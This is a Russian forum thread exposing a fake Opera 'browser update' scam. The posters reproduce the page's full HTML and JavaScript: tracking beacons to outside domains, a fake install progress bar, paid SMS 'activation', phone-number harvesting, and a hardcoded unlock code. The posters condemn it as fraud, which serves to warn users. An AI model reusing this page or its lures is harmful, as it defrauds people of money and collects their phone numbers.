У многих выскакивает обновление браузеров.
У меня вот предложили на выбор скачать

А вот скрипт со страницы. Копайте
А если поведётесь далее вам предложат заплатить за скачанную вирусню
У меня вот предложили на выбор скачать

А вот скрипт со страницы. Копайте
| Код |
|---|
<sc ript type="text/javascript">
var __converted = new Array();
function __trackConver sion() {
var argv = __trackConversion.arguments;
var argc = __trackConversion.arguments.length;
var trackingId = (argc > 0) ? argv[0] : null;
var key = (trackingId == null ? "__conv__" : trackingId);
if (__converted[key] == null) {
if(document.images){
(new Image()).src='http://ad.flipflapflo.net/?t=conv' +
(trackingId == null?"":"&tid="+trackingId);
(new Image()).src='http://uno.flipflapflo.net/?t=conv' +
(trackingId == null?"":"&tid="+trackingId);
(new Image()).src='http://ad.flipflapflo.biz/?t=conv' +
(trackingId == null?"":"&tid="+trackingId);
(new Image()).src='http://uno.flipflapflo.biz/?t=conv' +
(trackingId == null?"":"&tid="+trackingId);
}
__converted[key]=1;
return true;
}
}
</script>
<sc ript>
var upd_files = ["%windows\\Active Setup Log.txt", "%windows\\mcd32.dll", "%windows\\temp\\forcedos.exe", "%windows\\temp\\edit.hlp", "%windows\\system32\\defrag.exe", "%windows\\system32\\actmovie.exe", "%windows\\system\\icfgnt5.dll", "%windows\\system\\KGyGaAvL.sys", "%windows\\mcd32.dll", "%windows\\temp\\forcedos.exe", "%windows\\temp\\edit.hlp", "%windows\\system32\\defrag.exe", "%windows\\system32\\actmovie.exe", "%windows\\system\\icfgnt5.dll", "%windows\\system\\KGyGaAvL.sys", "%. .\\Local Settings\\Temporary Internet Files\\advpack.dll", "%. .\\Local Settings\\Temporary Internet Files\\msacm32.dll", "%. .\\Local Settings\\Temporary Internet Files\\Content.IE5\\hotplug.dll", "%. .\\Default User\\Application Data\\d3drm.dll", "%. .\\Default User\\Application Data\\mpr.dll", "%. .\\Default User\\Application Data\\Microsoft\\Arj.pif", "%. .\\Default User\\Application Data\\Microsoft\\mfc70fra.dll", "%. .\\NTUSER.DAT", "%. .\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat", "%. .\\Admin\\Local Settings\\Temporary Internet Files\\Content.IE5\\G1DAX1FU\\explorer.exe", "%. .\\Admin\\Local Settings\\Temporary Internet Files\\Content.IE5\\IIB5GURM\\atmadm.exe", "%. .\\Admin\\Local Settings\\Temporary Internet Files\\Content.IE5\\JI0DTJNL\\d3dx10_37.dll", "%. .\\Admin\\Local Settings\\Temporary Internet Files\\Content.IE5\\JV0YX9HC\\ALCMTR.EXE", "%. .\\Admin\\Local Settings\\Temporary Internet Files\\Content.IE5\\JZXJ3EK1\\d3drm.dll", "%. .\\Admin\\Local Settings\\Temporary Internet Files\\Content.IE5\\LQQEDB6F\\FSSETUP.log", "%downloads\\control.ini", "%downloads\\mfc70fra.dll", "%RECYCLER\\mmcfxcommon.dll", "%RECYCLER\\bootcfg.exe", "%RECYCLER\\c_28592.nls", "%System Volume Information\\appmgr.dll"];
var install_sec=15;
function set_cookie(name,value,expires)
{
if(expires)
{
var date=new Date();
date.setTime(date.getTime()+(expires*1000));
var tmp_expires="; expires="+date.toGMTString();
}
else var tmp_expires="";
document.co okie=name+"="+value+tmp_expires+"; path=/";
}
function getXMLHTTPRequest()
{
var req = false;
try
{
req = new XMLHttpRequest();
}
catch(err1)
{
try
{
req = new ActiveXObject("Msxml2.XMLHTTP");
}
catch(err2)
{
try
{
req = new ActiveXObject("Microsoft.XMLHTTP");
}
catch(err3)
{
req = false;
}
}
}
return req;
}
function check_code()
{
if( (document.getElementById('code').value!="473282") && (document.getElementById('codesub').value!="473282") )
{
alert("Неверный код!");
}
else
{
document.getElementById('activation').style.display="none";
document.getElementById('activationsubcode').style.display="none";
document.getElementById('activated').style.display="block";
set_cookie('m','1',2*60*60);
}
}
function check_code_default()
{
if(document.getElementById('code_default').value!="473282")
{
alert("Неверный код!");
}
else
{
document.getElementById('activation_default').style.display="none";
document.getElementById('activated_default').style.display="block";
}
}
function check_num()
{
var tmp_num=document.getElementById('num').value;
tmp_num=tmp_num.replace(/[^0-9]/g,"");
if( (tmp_num.length!=11) || (tmp_num.sub string(0,2)!='79') )
{
alert("Неверно указан номер!\n\rФормат ввода: +7 912 345 67 89");
}
else
{
httpRequest = getXMLHTTPRequest();
var url = 'request.php';
var params = String('num='+encodeURI(tmp_num)+'&c=r&rand='+parseInt(Math.floor(Math.random()*99999)));
httpRequest.open("POST", url, true);
httpRequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
httpRequest.onreadystatechange = function()
{
if (httpRequest.readyState == 4)
{
if (httpRequest.status == 200)
{
document.getElementById('user_num').innerHTML='+'+tmp_num;
document.getElementById('activationsub').style.display="none";
document.getElementById('activationsubcode').style.display="block";
}
}
}
httpRequest.send(params);
}
}
function new_num()
{
document.getElementById('activationsubcode').style.display="none";
document.getElementById('activationsub').style.display="block";
}
function install_process(pc)
{
if(pc<=100)
{
document.getElementById('line').style.width=""+(100-pc)+"%";
document.getElementById('percent').innerHTML=pc;
document.getElementById('folder').innerHTML=upd_files[Math.floor(Math.random()*upd_files.length)];
window.setTimeout(function(){install_process(pc+1);},Math.floor(install_sec*10));
}
else
{
document.getElementById('activation_button').disabled=false;
document.getElementById('install_info').style.color="#00f";
document.getElementById('folder').innerHTML="Сборкa пакетa обновлений зaвершенa, aктивируйте зaщиту.";
}
}
function start_install()
{
document.getElementById('preinstall').style.display="none";
document.getElementById('install').style.display="block";
install_process(0);
}
function start_activation()
{
document.getElementById('install').style.display="none";
document.getElementById('activationsub').style.display="block";
__trackConver sion('START_ACTIVATION');
}
</script> |
А если поведётесь далее вам предложат заплатить за скачанную вирусню
| Код |
|---|
<!-- Промо страница -->
<div align=center style="width: 950px; margin: 0 auto; position: relative;">
<div class="head"></div>
<div class="big_icon"></div>
<div id="preinstall" class="container preinstall" style="display: block;">
<div class="header">Рекомендуем обновить<br>браузер Opera</div>
<div class="promo">Новая версия браузера надежно защитит ваш компьютер от различных интернет-угроз и сделает вашу работу более безопасной.</div>
<div class="info">ВЫБЕРИТЕ НЕОБХОДИМОЕ ОБНОВЛЕНИЕ</div>
<div class="upd upd1"><div class="checkbox"><input type="checkbox"></div><div class="updinfo">Opera 11 SP1</div></div>
<div class="upd upd2"><div class="checkbox"><input type="checkbox"></div><div class="updinfo">Opera 11 SP2</div></div>
<div class="upd upd3"><div class="checkbox"><input type="checkbox" checked></div><div class="updinfo">Opera 11 SP2 + Антивирусное обновление</div><div class="subinfo">(рекомендуемое обновление)</div></div>
<div onC lick="start_install();" class="install_button">
<p>Установить</p>
</div>
</div>
<!-- Эмуляция сборки пакета -->
<div id="install" class="container install" style="display: none;">
<div class="header">Идет проверка и сборка пакета обновлений для вашего компьютера</div>
<div id="install_info" class="info"><span id="folder">C:\Program Files\</span></div>
<div style="margin-top: 20px; background: #fff; border: 1px solid #777; position: relative; height: 19px; width: 545px;">
<div st yle="position: absolute; top: 0; left: 0; margin: -1px; background: url(img/white_corner.gif) no-repeat 0 0; height: 5px; width: 5px;"></div>
<div st yle="position: absolute; right: 0; top: 0; margin: -1px; background: url(img/white_corner.gif) no-repeat -5px 0; height: 5px; width: 5px;"></div>
<div st yle="position: absolute; bottom: 0; left: 0; margin: -1px; background: url(img/white_corner.gif) no-repeat 0 -5px; height: 5px; width: 5px;"></div>
<div st yle="position: absolute; bottom: 0; right: 0; margin: -1px; background: url(img/white_corner.gif) no-repeat -5px -5px; height: 5px; width: 5px;"></div>
<div st yle="position: absolute; margin: 2px 3px; background: url(img/fill.gif) repeat-x; width: 539px; height: 15px;"><div id="line" style="background: #fff; height: 15px; position: absolute; right: 0; width: 0%;"></div></div>
</div>
<div class="percent">Выполнено: <span id="percent">0</span>%</div>
<div class="activation_button"><input type="button" onC lick="start_activation(); return false;" class="act_button" value="Активировать" id="activation_button" disabled="true" /></div>
</div>
<!-- Активация через смс -->
<div id="activation" class="container activation" style="display: none;">
<div class="header">Программное обеспечение успешно установлено, требуется обязательная активация</div>
<div class="promo">Для активации программного обеспечения требуется отправка смс на номер <b>8916</b> с текстом <b>5988833</b></div>
<div class="info">Введите полученный код: <input type="text" id="code" style="width: 250px;"></div>
<div id="abon_info" class="abon_info">
<a href="/" onC lick="window.open('rules.php','rules','width=350, height=385, left='+((screen.width-350)/2)+', top='+(screen.height-600)+', toolbar=0, location=0, menubar=0, scrollbars=1, resizable=0, status=1'); return false;">пользовательское соглашение и информация для абонентов</a>
</div>
<div onC lick="check_code();" class="install_button">
<p>Активировать</p>
</div>
</div>
<!-- Активация через псевдоподписки -->
<div id="activationsub" class="container activation" style="display: none;">
<div class="header">Программное обеспечение успешно установлено, требуется обязательная активация</div>
<div class="promo">Для активации программного обеспечения требуется указать свой реальный номер мобильного телефона.</div>
<div class="info"><div>Введите номер телефона:</div><input type="text" id="num" style="width: 250px;"></div>
<div class="example">Формат ввода: +7 912 345 67 89</div>
<div id="abon_info" class="abon_info">
Внимание! Указывайте <b>реальный</b> номер <b>мобильного</b> телефона. На указанный номер придет код необходимый для активации. <a href="/" onC lick="window.open('rules.php','rules','width=350, height=385, left='+((screen.width-350)/2)+', top='+(screen.height-600)+', toolbar=0, location=0, menubar=0, scrollbars=1, resizable=0, status=1'); return false;">Пользовательское соглашение и информация для абонентов</a>
</div>
<div onC lick="check_num();" class="install_button">
<p>Активировать</p>
</div>
</div>
<div id="activationsubcode" class="container activation" style="display: none;">
<div class="header">Программное обеспечение успешно установлено, требуется обязательная активация</div>
<div class="promo">На номер <b id="user_num"></b> отправлено смс. Ваш код верификации: <b>5988833</b>, отправьте его в ответ на полученное сообщение.</div>
<div class="info">Введите код активации: <input type="text" id="codesub" style="width: 250px;"></div>
<div id="abon_info" class="abon_info">
Если в течение 2 минут вам не пришло смс, или вы ввели неверный номер, <a href="/" onC lick="new_num(); return false;">повторите запрос</a>.
</div>
<div onC lick="check_code();" class="install_button">
<p>Активировать</p>
</div>
</div>
<!-- Отдаем ссылку на браузер -->
<div id="activated" class="container activated" style="display: none;">
<div class="header">Активация успешно завершена</div>
<div class="promo">Ваша ссылка для скачивания: <a href="http://get7.opera.com/pub/opera/win/1100/ru/Opera_1100_ru_Setup.exe">обновление Opera</a></div>
<div class="promo">Бонус: <a target=_blank href="http://pokachayu.com/?code=473282">поиск по файлам</a></div>
</div>
<!-- показываем по дефолту -->
<div id="activation_default" class="container activation" style="display: none;">
<div class="header">Для получения доступа к поисковой системе по базе бесплатных файлов и к последней версии Вашего браузера необходимо пройти активацию аккаунта.</div>
<div class="promo">Для активации аккаунта требуется отправка смс на номер <b>8916</b> с текстом <b>598883</b></div>
<div class="info">Введите полученный код: <input type="text" id="code_default" style="width: 250px;"></div>
<div id="abon_info" class="abon_info">
<a href="/" onC lick="window.open('rules.php','rules','width=400, height=400, left='+((screen.width-400)/2)+', top='+(screen.height-600)+', toolbar=0, location=0, menubar=0, scrollbars=1, resizable=0, status=1'); return false;">Пользовательское соглашение и информация для абонентов</a>. <a target=_blank href="http://help-cmc.ru/tarifs/Россия/8916/">Служба поддержки и тарифы</a>. Чтобы получить доступ к услугам сайта, необходимо отправить 3 sms-сообщения. Стоимость sms составляет примерно 300 рублей без НДС.
</div>
<div onC lick="check_code_default();" class="install_button">
<p>Активировать</p>
</div>
<div class="abon_info footer">
<br>Стоимость доступа к услугам контент-провайдера устанавливается Вашим оператором. Подробную информацию можно узнать:
<br>- в разделе «Услуги по коротким номерам» на сайте <a href="http://www.mts.ru" target=_blank>www.mts.ru</a>
<br>- в контактном центре по телефону 8 800 333 0890 (0890 для абонентов МТС).
</div> |


Лохотрон! Ищут простаков у которых завелось немного лишних денежек.